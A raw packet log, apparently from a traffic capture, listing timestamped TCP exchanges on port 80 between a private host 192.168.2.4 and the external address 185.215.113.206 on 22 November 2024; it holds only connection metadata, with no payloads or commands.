Nov 22, 2024 20:35:24.658389091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.659151077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.659198999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.659254074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.659296036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.660113096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.660162926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.660198927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.660254002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.661056995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.661096096 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.661144018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.661180973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.661987066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.662041903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.662080050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.662141085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.662930965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.662977934 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.663033962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.663078070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.663903952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.663914919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.663957119 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.664993048 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.665044069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.665046930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.665095091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.665755033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.665801048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.665844917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.665884972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.666692019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.666743040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.666815996 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.666857958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.667682886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.667730093 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.667776108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.667823076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.668545961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.668591022 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.668658018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.668699980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.669497967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.669540882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.669595957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.669645071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.670444012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.670490980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.670526981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.670567989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.726840973 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.726900101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.726908922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.726946115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.727215052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.727289915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.727293968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.727334023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.728149891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.728194952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.728298903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.728343010 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.729098082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.729136944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.785666943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.785722971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.785772085 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.785811901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.786103010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.786140919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.786148071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.786174059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.786895037 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.786935091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.786983967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.787020922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.787766933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.787807941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.787866116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.787905931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.788695097 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.788734913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.788824081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.788862944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.789654970 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.789695978 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.789738894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.789777040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.790622950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.790666103 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.790738106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.790777922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.791804075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.791846037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.791861057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.791899920 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.792547941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.792588949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.792675018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.792716026 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.793472052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.793513060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.793606043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.793647051 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.794353962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.794395924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.794467926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.794507980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.795474052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.795514107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.795577049 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.795615911 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.796214104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.796272993 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.796302080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.796339035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.797190905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.797233105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.797302961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.797343969 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.798083067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.798125029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.798171997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.798209906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.799043894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.799083948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.799141884 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.799181938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.799962044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.800004959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.800031900 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.800067902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.800906897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.800949097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.801011086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.801049948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.801843882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.801887035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.801917076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.801956892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.802819967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.802862883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.802978992 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.803018093 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.803801060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.803841114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.803848028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.803884029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.804702044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.804744005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.804799080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.804836988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.805629015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.805670977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.805815935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.805856943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.806555033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.806615114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.806772947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.806813955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.807471037 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.807512045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.807574034 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.807614088 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.808429003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.808470011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.808533907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.808573961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.809353113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.809393883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.809454918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.809494972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.810353994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.810395956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.810400963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.810436010 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.811269045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.811347008 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.811453104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.811489105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.812176943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.812222004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.812289000 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.812329054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.813086033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.813127995 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.844896078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.844944954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.844971895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.845005989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.845134974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.845174074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.845242977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.845284939 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.846098900 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.846139908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.846179962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.846218109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.847007990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.847049952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.847114086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.847151041 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.847982883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.848023891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.848098040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.848140955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.848903894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.848943949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.849025965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.849066019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.849847078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.849891901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.849952936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.849993944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.850786924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.850835085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.850943089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.850986004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.851747990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.851790905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.851862907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.851903915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.852682114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.852726936 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.852781057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.852819920 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.853612900 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.853653908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.853709936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.853746891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.854552031 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.854594946 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.854640007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.854677916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.855514050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.855557919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.855607986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.855648994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.856436014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.856478930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.856559992 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.856600046 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.857388020 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.857429028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.857475996 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.857515097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.858316898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.858355045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.858452082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.858483076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.859251022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.859302998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.859376907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.859417915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.860233068 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.860306025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.860369921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.860369921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.861119032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.861161947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.861263990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.861304045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.862087965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.862134933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.862175941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.862215996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.863004923 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.863045931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.918782949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.918829918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.918879986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.919167042 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.919256926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.919328928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.919341087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.919380903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.919966936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.920013905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.920142889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.920185089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.920912027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.920921087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.920959949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.977951050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.978018045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.978032112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.978053093 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.978358984 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.978405952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.978569031 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.978610039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.979290962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.979340076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.979419947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.979463100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.980216026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.980268955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.980331898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.980379105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.981199980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.981249094 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.981292963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.981334925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.982115030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.982175112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.982213974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.982258081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.983068943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.983117104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.983155966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.983225107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.984025955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.984071970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.984103918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.984143972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.984987974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.985038996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.985119104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.985163927 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.986049891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.986095905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.986114025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.986154079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.986982107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.987030029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.987078905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.987118006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.987730026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.987778902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.987823963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.987864971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.988734007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.988782883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.988801003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.988841057 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.989631891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:24.989677906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:24.989754915 CET	80	49750	185.215.113.206	192.168.2.4
